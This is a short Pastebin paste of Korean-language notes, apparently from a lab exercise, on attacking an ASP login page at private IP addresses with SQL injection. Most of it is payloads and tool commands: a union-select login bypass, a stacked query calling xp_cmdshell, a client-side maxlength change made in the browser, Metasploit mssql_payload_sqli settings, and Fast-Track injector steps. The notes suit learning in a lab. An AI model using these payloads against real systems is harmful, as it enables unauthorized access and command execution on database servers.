Advertisement
zmnkh

metasploit sql-injection

Mar 25th, 2015
566
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.34 KB | None | 0 0
  1. 192.168.182.134/loginCheck.asp?id=aaa&password=aaa&x=38&y=47
  2.  
  3. http://192.168.182.134/loginCheck.asp?id=raon00&password=raon0011&x=38&y=47\
  4.  
  5. 컬럼 갯수는 2개
  6.  
  7. union 은 두개의 table을 연결해 주는 것이므로 union 다음에 바로 select가 나온다.
  8.  
  9. id : ' union select 1,1--
  10. pw : 1 (두번째 1을 적어준다)
  11.  
  12. select id, password from " & tvlname & " where upper(id) = '" & UCase(id) & "'";
  13. 컬럼수 두개이고, 가상의 pw가 필요
  14.  
  15.  
  16. "cmd shell 사용여부 확인"
  17. a';exec master..xp_cmdshell 'mkdir c:\test';--
  18.  
  19. 개발자 도구에서 length를 조정한다. (script는 client side 언어 이므로 client 가 값을 변경할 수 있다)
  20. (DOM 탐색기 --> 요소선택)을 눌러서 max length를 확장하고 싶은 값으로 변경한다.
  21.  
  22.  
  23. use exploit/windows/mssql/mssql_payload_sqli 사용법
  24. set rhost 192.168.140.134
  25. set method post
  26. set get_path loginCheck.asp (취약한 페이지)
  27. set data id=[SQLi]&password=aa&x=38&y=47 (공격 코드를 [SQLi] 에 담아 줄께 라는 의미, 취약한 인자를 찾았으면..)
  28.  
  29. meta에서는 실패
  30.  
  31. FAST-TRACK 이란 툴로 한다.
  32. 4(mssql)선택 - 1번 (sql injector) - 1번 (query string....)
  33. http://192.168.182.134/loginCheck.asp?id='INJECTHERE&password=aa&x=38&y=47
  34.  
  35. sql injector - post 를 선택하면 http://192.168.182.134 까지만 넣어주면 된다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement